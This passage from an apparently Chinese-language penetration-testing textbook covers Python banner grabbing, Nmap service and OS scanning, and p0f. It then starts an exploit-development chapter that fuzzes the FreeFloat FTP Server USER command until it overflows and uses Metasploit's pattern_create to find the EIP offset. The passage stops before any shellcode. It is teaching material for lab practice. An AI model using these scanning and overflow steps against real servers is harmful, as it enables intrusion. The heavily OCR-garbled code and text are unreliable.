上 运行 着 什么 服务 。 但 是 这 样 做 有 两 个 明显 的 缺点 ， 一 是 很 多 人 会 将 服务 运行 在 其 他 端口 
上 ， 例 如 ， 将 本 来 运行 在 23 号 端口 上 的 Telnet 运行 在 22 号 端口 上 ， 这 样 就 会 误 以 为 这 是 一 
个 SSH 服务 ;二 是 这 样 得 到 的 信息 极为 有 限 ， 即 使 知道 目标 80 端口 上 运行 着 HTTP 服务 ， 
但 是 完全 不 知道 是 什么 软件 提供 的 这 个 服务 ， 也 就 无 从 查找 这 个 软件 的 漏洞 了 。Nmap 中 的 
nmap-services 库 中 就 提供 了 所 有 的 端口 和 服务 对 应 的 关系 。 

还 有 一 些 扫描 工具 采用 了 抓 取 软件 banner 的 方法 ， 因 为 很 多 的 软件 都 会 在 连接 之 后 提供 
一 个 表明 自身 信息 的 banner， 可 以 编写 程序 来 抓 取 这 个 banner 从 中 读 出 目标 软件 的 信息 ， 这 
是 一 个 比较 不 错 的 方法 。 

最 后 也 是 最 为 优秀 的 一 种 方法 ， 就 是 向 目标 开放 的 端口 发 送 探 针 数据 包 ， 然 后 根据 返回 
的 数据 包 与 数据 库 中 的 记录 进行 比 对 ， 找 出 具体 的 服务 信息 。 著 名 的 Nmap 扫描 工具 就 是 
采用 了 这 种 方法 ， 它 包含 一 个 十 分 强大 的 Nmap-service-probe 数据 库 ， 这 个 库 中 包含 世界 
上 大 部 分 常见 软件 的 信息 ， 而 且 这 个 库 还 在 完善 中 ， 读 者 也 可 以 将 自己 发 现 的 软件 信息 添 
加 到 里 面 。 

接 下 来 按照 上 面 介 绍 的 几 种 思路 来 编写 对 目标 服务 进行 扫描 的 程序 。 首 先 编写 一 个 利用 
抓 取 软 件 banner 的 方式 ， 这 里 使 用 之 前 介绍 过 的 Socket 库 。 

首先 引入 需要 的 Socket 库 : 
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import socket 

然后 初始 化 一 个 TCP 类 型 的 Socket: 

s=socket .socket () 

使 用 这 个 Socket 去 连接 目标 127.0.0.1 的 21 号 端口 (测试 使 用 的 本 机 地 址 ): 

S.connect(("”127.0.0.1”, 21)) 

连接 成 功 之 后 ， 向 目标 发 送 任意 的 一 段 数据 : 

S.-send("111111") 

通常 目标 会 将 自己 的 banner 作为 应 答 信 息 返 回 : 

banner = s.recv(1024) 

关闭 这 个 连接 : 

s.close () 

打印 输出 得 到 的 banner: 

print 'Banner: {}'.format (banner) 

下 面 对 这 个 程序 进行 完善 。 在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 
以 “ServiceScan.py” 为 名 保存 起 来 ， 在 Run Configurations 中 为 这 个 程序 指定 两 个 参数 
“192.168.169.133 21”， 然 后 执行 如 下 代码 。 

import sys 

import socket 

if len(sys.argv) != 3: 

print ('Usage:ServiceScan<IP Port>\n eg: ServiceScan 192.168.1.1 80') 
sys.exit(1) 

target= sys.argv[1] 

port= int(sys.argv[2]) 

s=socket.socket () 

res = s.connect((target, port)) 

s.send('111111') 

service = s.recv(1024) 


s.close () 
print'Port in {} '.format(port)+'Service: {}'.format (service) 


在 192.168.169.133 上 运行 一 个 FreeFloat FTP Server 作为 测 
试 目标 ， 这 款 软 件 的 运行 界面 如 图 5-48 所 示 。 二 SEA 

执行 上 面 编 写 的 ServiceScan .py 脚本 的 结果 如 图 5-49 所 示 。 seiNe 

这 个 程序 有 待 进一步 完善 ， 例 如 使 用 正则 表达 式 等 ， 留 竺 m 
读者 自行 完成 。 另 外 ， 由 于 这 个 程序 要 依赖 于 目标 工具 提供 的 图 5-48 运行 的 FreeFloat 
信息 ， 所 以 并 不 通用 ， 例 如 ， 目 标 主 机 在 80 端口 上 运行 着 另外 FTP Server 软件 
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一 款 工具 Easy File Sharing Web Server， 这 个 程序 就 无 效 了 ， 如 图 5-50 所 示 。 


© Console x |E root@kali: ~ DProblems F PyUnit 
# x $ Q. G a RBE = = 
termina! 


Port in 21 Service: 220 FreeFloat Ftp Server (Version 1.00). 


图 5-49 使 用 ServiceScan.py 脚本 扫描 192.168.169.133 的 结果 


Start SSL About 


Porti 80 Restart 
URs x Pup/12.168.169.133 -E 


o °| kj 
Stop SSL 


SS pet +G Restwt 
SSLURL: https://192.168.169.133 “加 


[Enable guest toregster anew account C) 
[Z] Logn to virtual folder by default 

[Z] Alow users to upload fies to forums 

E Disable forums 

[Z Nlow fles to be overwritten 

El Save log to fie [m] 


More Options... | [ SMTP Setup... | (Templates... ] Senice. ] 


[Web Server is online] / [SSL Server is online] 


图 5-50 目标 主机 80 端口 上 运行 的 Easy File Sharing Web Server 软件 


如 果 目 标 是 Easy File Sharing Web Server, ServiceScan.py 就 会 一 直 没 有 反应 。 只 能 换 另 
一 种 办 法 。 其 实 除了 使 用 Socket 这 个 库 来 完成 对 服务 进行 扫描 之 外 ， 也 可 以 使 用 更 为 强大 的 
Nmap 库 。 这 种 方法 更 为 简单 高 效 。Nmap 本 身 提 供 了 一 种 目前 最 为 优秀 的 服务 扫描 功能 ， 可 
以 直接 调用 Nmap 进行 扫描 ， 然 后 再 读 取 结 果 ， 这 个 编程 过 程 有 一 种 “站 在 巨人 的 肩膀 上 ” 


的 感觉 。 


扫描 的 过 程 很 简单 ， 核 心 语句 变 成 了 nm.scan(target, port,"-sV")， 关 键 是 对 扫描 结果 的 


处 理 。 


扫描 之 后 得 到 的 每 一 台 主 机 的 信息 都 是 一 个 字典 文件 ， 例 如 ，nm["192.168.1.1"] 就 是 一 


个 字典 文件 ， 这 个 字典 的 结构 如 下 所 示 。 


# T"'aqdresses*; ("ipwa&sr ?*127.0.0.1");, 
# 'hostnames': [], 
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# "osmatch': [('"accuracy': '98', 
+ "line": "36241", 
+ 'name': 'Juniper SA4000 SSL VPN gateway (IVE OS 7.0)', 
# "osclass': [('"accuracy': '98', 
+ 'cpe': ['cpe:/h:juniper:sa4000', 
+ 'cpe:/o:juniper:ive_os:7'], 
# "osfamily': 'IVE OS', 
+ "osgen': '7.X', 
# 'type': 'firewall', 
# 'vendor': 'Juniper'}]}, 
# ("*accuracy"s "91", 
# “时 和 547378", 
+ 'name': 'Citrix Access Gateway VPN gateway', 
# "osclass': [('"accuracy': '91', 
+ 'cpe': [], 
# 'osfamily': 'embedded', 
# 'osgen': None, 
# *type': "proxy server', 
# “vendor”: *Cityix'])])1, 
# 'portused': [('portid': '443', 'proto': 'tcp', 'state': 'open'}, 
# (*portid*s 113%, "Drotos "*tcp", "state*r “closed” ij, 
# "status': ('reason': 'syn-ack', 'state': 'up'), 
# "tept 41135 "gobi": 13%; 
# ES A 
# "extrainto"s ° *, 
# 'name': 'ident', 
# "product": **, 
# 'reason': 'conn-refused', 
# "state': 'closed', 
# tyérdiont: rp, 
+ 483; ("conf": "10%, 
# repete Tei 
# Yextrainross "0 
# 'name': 'http', 
# 'product': 'Juniper SA2000 or SA4000 VPN gateway http config', 
# "'reason': 'syn-ack', 
# 'state': 'open', 
# "Version': ''}}, 
# 'vendor': {}} 
其 中 最 为 重要 的 几 项 如 下 。 


(1) addresses” 用 来 存储 主机 的 IP 地 址 。 

(2 )“hostnames ”用 来 存储 主机 的 名 称 。 

(3 )“osmatch” 用 来 存储 主机 的 操作 系统 信息 。 

(4 )“portused” 用 来 存储 主机 的 端口 信息 (开放 或 者 关闭 )。 

(5 )“status ”用 来 存储 主机 的 状态 (活跃 或 者 非 活 跃 )。 

(6 ) “tcp” 用 来 存储 端口 的 详细 信息 (例如 状态 ， 以 及 运行 的 服务 和 提供 服务 的 软件 版 本 )。 
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如 果 需 要 从 扫描 的 结果 中 找 出 127.0.0.1 的 80 端口 上 运行 的 服务 的 信息 ， 就 可 以 使 用 
nm[127.0.0.1][tcp][80][product])。 


import sys 
import nmap 
if len(sys.argv) != 3: 
print ('Usage:ServiceScan <IP>\n eg: ServiceScan 192.168.1.1') 
sys.exit(1) 
target= sys.argv[1] 
port= sys.argv[2] 
nm = nmap.PortScanner () 
nm.scan(target, port,"-sV") 
for host in nm.all_hosts(): 
for proto in nm[host].all_protocols () : 
lport = nm[host] [proto] .keys () 
lport.sort() 
for port in lport: 
print ('port : %s\tproduct : $s' % (port,nm[host] [proto] [port] 
['product'])) 


这 个 程序 更 加 完善 ， 将 其 保存 为 ServiceScan2.py， 然 后 用 它 来 扫描 目标 ， 得 到 的 结果 如 
图 5-51 所 示 。 


EJ) Console x W root@kali:~ © Problems Fù PyUnit 
# x 9 Q, G ü dBA - Ə v 


由 port : 80 product : Easy File Sharing Web Server httpd 


图 5-51 使 用 ServiceScan2 py 脚本 扫描 192.168.169.133 的 结果 


读者 可 以 尝试 使 用 这 个 程序 去 扫描 其 他 主机 上 运行 的 服务 程序 ， 它 在 实际 中 应 用 的 成 功 
率 要 远 远 高 于 前 面 的 两 个 程序 。 


55 操作 系统 扫描 


很 多 人 都 一 直 认为 判断 远程 主机 的 操作 系统 是 一 件 很 简单 的 事情 ， 因 为 在 他 们 的 印象 中 
世界 上 只 有 那么 几 种 操作 系统 而 已 ，Windows 7. Windows 10， 最 多 加 上 Linux， 也 就 没有 
什么 了 。 但 对 于 目标 操作 系统 的 扫描 是 一 件 极为 复杂 的 事情 ， 其 实 这 个 世界 中 操作 系统 的 数 
目 要 远 比 我 们 想 的 要 多 得 多 。 不 光 是 Linux 内 核 衍生 了 大 量 的 操作 系统 ， 即 便 是 现在 的 各 种 
网 络 设 备 ， 例 如 防火 墙 、 路 由 器 和 交换 机 都 安装 了 操作 系统 ， 而 这 些 系统 都 是 厂家 自行 开发 
的 ， 例 如 思科 和 华为 都 有 自己 的 系统 。 另 外 ,各 种 各 样 的 可 移动 设备 、 智 能 家 电 所 使 用 的 操 
作 系 统 就 更 多 了 。 
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现在 很 多 著名 的 工具 都 提供 了 远程 对 操作 系统 进行 检测 的 功能 ， 这 一 点 用 在 人 侵 上 
就 可 以 成 为 黑客 的 工具 ， 而 用 在 网 络 管理 上 就 可 以 进行 资产 管理 和 操作 系统 补丁 管理 。 但 
是 并 没有 一 种 工具 可 以 提供 绝对 准确 的 远程 操作 系统 信息 。 几 乎 所 有 的 工具 都 使 用 了 一 种 
“ 猜 ” 的 方法 。 当 然 这 不 是 凭空 的 猜测 ， 目 前 远程 对 操作 系统 进行 检测 的 方法 一 般 可 以 分 成 
以 下 两 类 。 

(1 ) 被 动 式 方法 : 这 种 方法 是 通过 抓 包工 具 来 收集 流 经 网 络 的 数据 包 ， 再 从 这 些 数 据 包 
中 分 析出 目标 主机 的 操作 系统 信息 。 

(2) 主动 式 方法 : 向 目标 主机 发 送 特定 的 数据 包 ， 目 标 主 机 一 般 会 对 这 些 数据 包 做 出 回 
应 ， 对 这 些 回 应 做 出 分 析 ， 就 有 可 能 得 知 远程 主机 的 操作 系统 类 型 。 这 些 信 息 可 以 是 正常 的 
网 络 程序 如 Telnet, FTP 等 与 主机 交互 的 数据 包 ， 也 可 以 是 一 些 经 过 精心 构造 、 正 常 的 或 残 
缺 的 数据 包 

首先 看 一 下 第 一 种 方法 ，Kali Linux 2 中 安装 的 p0f 就 是 一 款 典 型 的 被 动 式 扫描 工具 
pOf 可 以 自动 地 捕获 网 络 中 通信 的 数据 包 ， 并 对 其 进行 分 析 ， 使 用 的 方法 很 简单 ， 可 以 在 命 
令 行 中 直接 输入 “p0f”， 如 图 5-52 所 示 

root@kali: ~ # pOf 

这 时 p0f 就 会 开始 监听 网 络 中 的 通信 


- pOf 3.09b by Michal Zalewski <lcamtuf@coredump.cx> --- 


Closed 1 file descriptor. 

Loaded 322 signatures from '/etc/p0f/p0f.fp'. 
Intercepting traffic on default interface 'eth0'. 
Default packet filtering configured [+VLAN]. 
Entered main event loop. 


图 5-52 在 Kali Linux 2 中 启动 p0f 
然后 ， 打 开 浏览 器 访问 http://192.168.169.133/ (这 么 做 是 为 了 产生 和 192.168.169.133 通 
信 的 流量 。 在 192.168.169.133 上 有 Web 服务 器 )。 很 快 就 可 以 得 到 结果 ， 如 图 5-53 所 示 。 


root@kali: ~ 
File Edit View Search Terminal Help 


- [ f192.168.169.133f49201 -> 192.168.169.130/80 (syn) ]- 


69 1337492081 
or 8 


ne 
4:128+0:0:1460:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0 


图 5-53 ”使 用 p0f 分 析 192.168.169.133 操作 系统 的 结果 
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对 于 第 二 种 主动 式 方法 ， 可 以 采用 向 目标 发 送 数据 包 的 方式 来 检测 ， 但 是 这 需要 设计 
一 系列 的 探 针 式 数据 包 ， ee 这 个 工作 量 是 相当 大 
的 ， 在 这 里 使 用 Nmap 库 文件 来 编写 一 个 主动 式 扫描 程序 ， 首 先 还 是 在 命令 行 中 来 实现 这 个 
程序 ， 首 先导 入 Nmap JE: 

>>> import nmap 

然后 创建 一 个 PortScanner 对 象 出 来 : 

>>> nm=nmap .PortScanner () 


对 192.168.169.133 进行 扫描 ， 扫 描 的 参数 为 “ 
>>> nm.scan("192.168.169.133","-O") 


扫描 的 结果 如 图 5-54 所 示 


ov 11 01:34:41 2017', ' 


eo ine': None}, 


图 5-54 使 用 Nmap 库 扫 描 192.168.169.133 操作 系统 的 结果 


这 个 扫描 的 结果 看 起 来 有 些 乱 ， 在 前 面 已 经 介绍 了 Nmap 扫描 结果 的 结构 


'type': 'firewall', 


"osmatch': [('accuracy': '98', 
+ "lines 36241"; 
# 'name': 'Juniper SA4000 SSL VPN gateway (IVE OS 7.0)', 
# "osclass': [('accuracy': '98', 
# 'cpe': ['cpe:/h:juniper:sa4000', 
# 'cpe:/o:juniper:ive_os:7'], 
# 'osfamily': 'IVE OS', 
# "osgen': '7.X', 
# 
# 


'vendor': 'Juniper')]), 

这 个 osmatch 是 一 个 字典 类 型 ， 它 包括 'accuracy' 'line' 'osclass' 三 个 键 ， 而 'osclass' 中 包 
含 关键 信息 ， 它 本 身 也 是 一 个 字典 类 型 ， 其 中 包含 ene (匹配 度 )、'cpe' (通用 平台 枚 
举 )、'osfamily' (系统 类 别 )、'osgen' (第 几 代 操作 系统 )、'type' (设备 类 型 )、'vendor' (生产 厂 
家 ) 6 个 键 。 

下 面 给 出 了 一 个 使 用 Nmap 库 编写 的 完整 程序 。 

import sys 

import nmap 

if len(sys.argv) != 2: 


print ('Usage:0Sscan <IP> n eg: OSscan 192.168.1.1') 
sys.exit (1) 
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target= sys.argv[1] 
nm = nmap.PortScanner() 
nm.scan(target, arguments="-O") 
if 'osmatch' in nm[target]: 
for osmatch in nm[target]['osmatch']: 
print ('OsMatch.name : {0}'.format (osmatch['name'])) 
print('OsMatch.accuracy : {0) .format (osmatch['accuracy'])) 
print ('OsMatch.line : {0}'.format (osmatch['line'])) 
Peint(""y 
if 'osclass' in osmatch: 
for osclass in osmatch['osclass']: 
print('OsClass.type : {0}'.format (osclass['type'])) 
print ('OsClass.vendor : (0]'.format(osclass['vendor'])) 
print ('OsClass.osfamily : (0)'.format(osclass['osfamily'])) 
print('OsClass.osgen : {0}'.format(osclass['osgen']) 
print ('OsClass.accuracy : {0}'.format (osclass ['accuracy'])) 
print ('') 


TE Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 “OSScan” 为 名 保存 起 来 ， 在 Run 
Configurations 中 为 这 个 程序 指定 一 个 参数 “192.168.169.133”"， 然 后 执行 这 个 程序 ， 结 果 如 
图 5-55 所 示 。 


| console x |m root@kali: ~ DProblems RPyUnit =a 
CLR EH 


OsMatch.name : Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP| 


OsMatch. line : 72148 


OsClass.type : 
OsClass.vendor : Microsoft 
OsClass.osfamily : Windows 
OsClass.osgen : 7 

OsClass.accuracy : 


general purpose 


100 


图 5-55 使 用 Nmap 库 扫描 192.168.169.133 操作 系统 的 结果 
这 个 程序 扫描 的 结果 是 最 为 精准 的 。 


小 结 


在 本 章 中 ， 以 Python 作为 工具 ， 详 细 介绍 了 信息 搜集 的 各 种 方法 。 从 基础 用 法 开始 ， 
逐步 介绍 如 何 使 用 Python 对 目标 的 在 线 状 态 、 端 口 开放 情况 、 操 作 系统 、 运 行 的 服务 和 软件 
进行 扫描 。 信 息 搜集 的 工具 其 实 很 多 ，Kali Linux 2 中 就 提供 了 多 达 数 十 种 ， 但 是 最 为 优秀 的 
扫描 工具 却 非 Nmap 莫 属 。 关 于 这 款 工具 的 详细 用 法 ， 可 以 阅读 《 诸 神 之 腿 一 一 Nmap 网 络 
安全 审计 技术 揭秘 》。 

在 第 6 章 中 将 介绍 发 现 目标 主机 上 运行 的 程序 之 后 ， 如 何 开展 对 这 个 程序 的 渗透 工作 。 


00 漏洞 滩 适 模块 的 编写 


之 前 已 经 学 习 了 如 何 使 用 Python 来 对 目标 的 信息 进行 搜集 ， 但 是 发 现 了 信息 之 后 ， 又 
该 如 何 使 用 这 些 信息 呢 ? 在 这 一 章 中 学 习 一 下 如 何 开 发 一 个 漏洞 渗透 模块 ， 选 择 的 目标 是 一 
个 简单 的 软件 FreeFloat FTP Server， 这 是 一 款 十 分 受 欢 迎 的 FTP 服务 器 软件 ， 但 是 这 款 软 
件 早期 的 版 本 中 存在 一 个 栈 溢出 的 漏洞 ， 因 此 会 被 人 利用 从 而 发 生 远程 代码 执行 的 问题 ， 攻 
击 者 可 能 借 此 来 控制 安装 有 该 软件 的 计算 机 设备 ， 读 者 可 以 在 https://www.exploit-db.com/ 
apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip 下 载 这 个 软件 。 

在 本 章 中 将 会 讲解 如 下 几 点 内 容 。 

(1) 如 何 对 软件 的 溢出 漏洞 进行 测试 。 

(2 ) 计算 软件 溢出 的 偏 移 地 址 。 

(3 ) 查找 JMP ESP 指令 。 

(4) 编写 渗透 程序 。 

(5 ) 坏 字符 的 确定 。 

(6 ) 使 用 Metasploit 来 生成 Shellcode。 


6.1 测试 软件 的 溢出 漏洞 


渗透 工具 看 起 来 功能 是 不 是 十 分 神奇 ? 现在 就 来 学 习 如 何 对 一 个 软件 进行 渗透 ， 这 次 渗 
透 测 试 的 目标 为 Free Float FTP Server， 这 是 一 个 十 分 简单 的 FTP 工具 。 将 这 个 工具 放置 在 
虚拟 机 Windows XP 中 ， 然 后 运行 这 个 工具 ， 如 图 6-1 所 示 。 


第 6 章 漏洞 渗透 模块 的 编写 < 119 


FreeFloat FTP Server 会 在 运行 的 主机 上 建立 一 个 FTP， 其 。 B E3 
他 计算 机 上 的 用 户 可 以 登录 到 这 个 FTP 上 来 存 取 文 件 ， 例 如 ， a Masa 


了 G Start Port No 
在 主机 192.168.1.106 的 C 盘 中 运行 这 个 FTP 软件 ， 在 另外 一 台 [21 Unload 
计算 机 中 可 以 使 用 FTP 下 载 工 具 或 者 命令 的 方式 进行 访问 。 这 
里 采用 命令 的 方式 对 其 进行 访问 ， 如 图 6-2 所 示 


mI EA CAWindows\system32\cmd.exe - ftp EE Eem] 


图 6-1 FreeFloat FTP Server 


图 6-2 远程 连接 到 FreeFloat FTP Server 


这 里 面 首先 在 其 中 使 用 FTP 命令 ， 然 后 使 用 open 命令 打开 192.168.1.106。 注 意 不 要 使 
用 浏览 器 打开 这 个 FTP， 那 样 做 将 无 法 看 到 登录 过 程 
使 用 FreeFloat FTP Server 这 个 服务 器 对 登录 没有 任何 的 限制 ,输入 任意 的 用 户 名 和 密码 


都 可 以 登录 进去 ， 如 图 6-3 所 示 
gs EEA: C\Windows\system32\cmd.exe - ftp | <a [= [= jstsaj 


图 6-3 输入 任意 的 用 户 名 
在 这 里 随意 输入 一 些 字符 例如 “aaa”， 然 后 按 回 车 键 ， 如 图 6-4 所 示 
E EA CAWindows system32Vcmd.exe - ftp | l-lok 


图 6-4 输入 任意 的 密码 
同样 密码 也 随意 输入 即 可 ， 例 如 输入 “aaaaaaa”， 然 后 按 回 车 键 ， 如 图 6-5 所 示 。 


画 EA: C\Windows\system32\cmd.exe - ftp 
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这 里 显示 用 户 aaa 已 经 成 功 登录 ， 可 以 使 用 FTP 中 的 任意 资源 ， 其 实 这 里 使 用 任何 一 个 
用 户 名 都 可 以 成 功 登 录 


现在 来 看 看 这 个 工具 是 否 存在 栈 溢 出 漏洞 。 现 在 输入 用 户 名 的 时 候 ， 尝 试 使 用 一 个 特别 
长 的 字符 串 作为 用 户 名 ,来 看 看 在 用 户 名 输入 的 位 置 是 否 存在 溢出 的 漏洞 ， 例 如 输入 数 百 个 


“a”， 如 图 6-6 所 示 


= \Windows\system32\cmd.exe - ftp 


— | 


图 6-6 以 数 百 个 “a” 作 为 用 户 名 


但 是 系统 并 没有 崩溃 ， 而 是 正常 地 出 现 了 输入 密码 的 界面 ， 如 图 6-7 所 示 


E EEA C\Windows\system32\cmd.exe - ftp 


Eem] 


图 6-7 输入 密码 


这 时 不 要 放弃 ， 再 尝试 输入 更 多 的 “a” 作 为 用 户 名 ， 如 图 6-8 所 示 


3 SRA CNwindowsveystem3zcmdexe -ftp 0 ;— “ =a 


图 6-8 输入 更 多 的 “a” 作 为 用 户 名 
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目标 系统 仍然 正常 出 现 了 输入 密码 的 界面 ， 可 见 系统 没有 崩溃 。 那 么 是 不 是 这 个 软件 并 
没有 存在 溢出 的 问题 呢 ? 在 编写 渗透 模块 时 ， 千 万 不 要 在 此 时 就 放弃 ， 打 开 WireShark 来 捕 
获 此 次 登录 的 数据 包 来 看 一 下 ， 如 图 6-9 所 示 。 


ae E e E a EDU e p O T 
62:46:29 (Ac: cc 62: 62:4e:29), Dst, Vavare_90:2F:69 EEE EEO) 

192.168.1.108, Dst: ERES 

`< Port: 8897 (8897), Dst Port: 21 (21), Seq: 


1, Ack: 43, Len: 85 


图 6-9 使 用 WireShark 捕获 登录 过 程 的 数据 包 

在 这 里 可 以 发 现实 际 上 发 送出 去 数据 包 中 的 字符 “a” 的 数量 并 没有 那么 多 ， 无 论 在 登 
录用 户 名 时 输入 多 么 长 的 用 户 名 ， 而 实际 上 发 送出 去 的 只 有 78 个 “a”。 显 然 这 个 长 度 的 字 
符 是 无 法 引起 溢出 的 ， 那么 有 什么 办 法 可 以 加 大 字符 串 的 数量 呢 ? 

最 直接 的 方法 就 是 自行 构造 数据 包 ， 然 后 将 数据 包 发 送出 去 。 这 样 想 要 数据 包 中 包含 多 
少 个 “a”， 就 可 以 发 送 多 少 个 “a” 出 去 。 

首先 编写 一 个 可 以 自动 连接 到 FreeFloat FTP Server 的 客户 端 脚本 ， 先 来 建立 一 个 到 
FreeFloat FTP Server 的 连接 。 因 为 这 个 软件 提供 的 是 FTP 服务 ， 所 以 只 需要 按照 连接 FTP 的 
过 程 来 编写 这 段 脚 本 即 可 ， 而 且 这 段 脚本 可 以 用 来 连接 到 任何 提供 FTP 服务 的 软件 上 。 

首先 导入 需要 使 用 的 socket 库 

import socket 


执行 的 结果 如 图 6-10 所 示 。 

= 一 ss 

图 6-10 在 Python 中 导入 所 需要 的 库 

接着 创建 一 个 socket 套 接 字 : 
s=socket.socket (socket .AF_ INET, socket .SOCK_ STREAM) 
执行 的 结果 如 图 6-11 所 示 。 

[>>> -socket socket socket QF INET. socket SOCK STREAM | 

图 6-11 {EJH update 更 新 系统 的 软件 包 索 引 
利用 这 个 套 接 字 就 可 以 建立 到 目标 的 连接 : 
connect=s.connect(('192.168.79.131',21)) 
执行 之 后 ， 就 建立 好 一 个 到 目标 主机 21 端口 的 连接 ,但 是 到 FTP 的 连接 需要 认证 ， 仍 
然 需 要 向 目标 服务 器 提供 一 个 用 户 名 和 一 个 密码 。 服 务 器 通常 会 对 用 户 名 和 密码 的 正确 性 进 
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行 验证 ， 也 就 是 将 用 户 的 输入 与 自己 保存 的 记录 进行 比 对 。 

可 以 将 用 户 名 的 输入 作为 一 个 测试 点 ， 这 也 是 一 个 最 为 常见 的 情形 。 主 要 是 因为 早期 的 
时 候 ， 很 多 程序 员 都 会 使 用 memcpy() 这 个 函数 来 将 用 户 的 输入 复制 到 一 个 变量 中 ,但 是 这 
些 程序 员 往 往 会 忽略 对 地 址 是 否 越界 进行 检查 ， 从 而 导致 数据 的 溢出 ， 进 而 引发 代码 远程 执 
行 的 问题 。 

现在 把 FreeFloat FTP Server 用 户 名 的 输入 作为 渗透 测试 的 切入 点 ， 首 先 来 检查 这 个 软件 
是 否 存 在 栈 溢出 的 现象 ， 这 个 检查 其 实 很 简单 ， 在 输入 用 户 名 的 时 候 ， 并 不 像 常规 的 那样 ， 
输入 几 个 或 者 十 几 个 字符 ， 而 是 输入 成 百 上 千 的 字符 ， 同 时 观察 目标 服务 器 的 反应 。 

首先 观察 一 下 正常 连接 到 目标 服务 器 上 数据 包 的 格式 。 

此 处 使 用 WireShark 抓 取 输入 用 户 名 的 数据 包 ， 并 观察 其 中 的 格式 ， 如 图 6-12 所 示 。 


Frane 51750; 139 bytes on 


(3112 bit S f 12 captured (1112 bits) on interface © 
48:29 (4c:c 29), Dst: Va<are_90:26:69 (0:0c :29:90:2£:69) 
E a 352.168,1.105 
Port: : 21 (21), Seq: 1, Ack: 23, Len: 85 


图 6-12 登录 的 数据 包 格式 
图 6-12 中 输入 的 用 户 名 是 一 段 字符 ， 这 段 字 符 前 面 是 “USER”， 后 面 是 一 个 回 车 符 和 
换行 符 “\rm”。 使 用 socket 套 接 字 中 的 send() 方法 可 以 将 一 个 字符 串 以 数据 包 的 形式 发 送出 
去 ， 这 里 面 以 成 百 上 千 的 “A” 作 为 用 户 名 。 


s.send('USER 


\r\n') 
将 这 个 数据 包 发 送 到 目标 FTP 服务 器 上 ， 可 以 看 到 这 个 FTP 服务 器 工具 崩溃 了 ， 并 且 
出 现 了 如 图 6-13 所 示 的 问题 提示 。 


Error 区 


(x) Dont know how to continue because memory at address 41414141 is not readable. Try to change EIP or pass exception to program. 


图 6-13 引起 了 目标 崩溃 


6.2 ”计算 软件 溢出 的 偏 移 地 址 


这 里 显示 软件 FreeFloat FTP Server 执行 到 地 址 “41414141” 处 时 就 无 法 再 继续 进行 。 按 
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照 之 前 介绍 的 知识 ， 出 现 这 种 情况 的 原因 是 原本 保存 下 一 条 地 址 的 EIP 寄存 器 中 的 地 址 被 溢 
出 的 字符 “A” 所 覆盖 。“ \x41” 在 ASCII 表 中 表示 的 正 是 字符 “ A”， 也 就 是 说 现在 EIP 寄 
存 器 中 的 内 容 就 是 “AAAA”， 而 操作 系统 无 法 在 这 个 地 址 找到 一 条 可 以 执行 的 命令 ， 从 而 
引发 系统 的 崩溃 。 

现在 可 以 在 调试 器 中 看 到 EIP 的 地 址 ， 但 是 必须 知道 程序 在 操作 系统 中 的 执行 是 动态 
的 ， 也 就 是 说 每 一 次 这 个 软件 执行 时 所 分 配 的 地 址 都 是 不 同 的 。 所 以 现在 需要 知道 的 不 是 
EIP 的 绝对 地 址 ， 而 是 EIP 相对 输入 数据 起 始 位 置 的 相对 位 移 。 

如 果 这 个 位 移 的 值 不 大 ， 可 以 用 逐步 尝试 的 方法 获取 这 个 值 。 但 是 如 果 位 移 比较 大 ， 

还 需要 使 用 到 一 些 工 具 来 提高 效率 ， 例 如 ， 这 里 就 可 以 借助 Metasploit 中 内 置 的 两 个 工具 

pattern create 和 pattern_offset 来 完成 这 个 任务 

这 两 个 工具 各 自 具 有 自己 的 功能 , pattern_create 可 以 用 来 创建 一 段 没 有 重复 字符 的 文本 。 
将 这 段 文本 发 送 到 目标 服务 器 ， 当 发 生 溢出 时 ， 记 录 下 程序 发 生 错误 的 地 址 (也 就 是 EIP 中 
的 内 容 )， 这 个 地 址 其 实 就 是 文本 中 的 4 oe 然后 可 以 利用 pattern_offset 快速 找到 这 4 个 
rt 而 这 个 偏 移 量 就 是 EIP 寄存 器 的 地 址 

现在 先 来 演示 一 下 这 个 过 程 

首先 启动 Kali Fi 打开 一 个 终端 ， 然 后 切换 到 Metasploit 的 目录 : 

root@kali:cd /usr/share/metasploit-framework/tools/exploit 

然后 在 这 个 目录 中 执行 工具 pattern_create.rb， 这 是 一 个 由 Ruby 语言 编写 的 脚本 。 

如 果 读 者 想 了 解 这 个 工具 的 使 用 方法 ， 可 以 使 用 参数 -h 来 显示 所 有 可 以 使 用 的 参数 及 
其 用 法 。 

图 6-14 给 出 了 这 个 工具 的 用 法 ， 其 中 最 为 常用 的 参数 是 -1|， 这 个 参数 可 以 用 来 指定 生成 
字符 串 的 长 度 ， 接 下 来 生成 一 段 500 个 字符 的 文本 ， 如 图 6-15 所 示 。 


/pattern_create.rb -h 


图 6-15 使 用 pattern_create.tb 产生 长 度 为 500 的 字符 串 
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然后 使 用 这 个 pattern_create.rb 产生 的 字符 来 代替 那些 “ A”。 仍然 使 用 前 面 那 段 连接 目 
标 服务 器 的 Python 脚本 将 这 个 内 容 发 送出 去 。 


s.send('USER Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1 
Ac2Ac3Ac4Ac5Ac6Ac7AcC8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0AelAe2Ae3Ae4Ae5Ae6Ae7Ae8Ae 
9AfOAflAf2Af3Af4Af5Af6Af7JAf8Af9AgO0AglAg2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A 
h7AhB8Ah9Ai0AilAi2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AjJ3Aj4AjJ5Aj6Aj7AjJ8Aj9AkOAk1Ak2Ak3Ak4 
AkSAk6Ak7Ak8Ak9A10A11A12A13A14A15A16A17A18A19AmO0AmlAm2Am3Am4Am5Am6Am7Am8Am9An0AnlAn 
2An3An4An5An6An7An8An9A00A01A02A03A04A05A06A07A08A09Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9A 
q0AqlAq2Aq3Aq4Aq5Aq\r\n') 


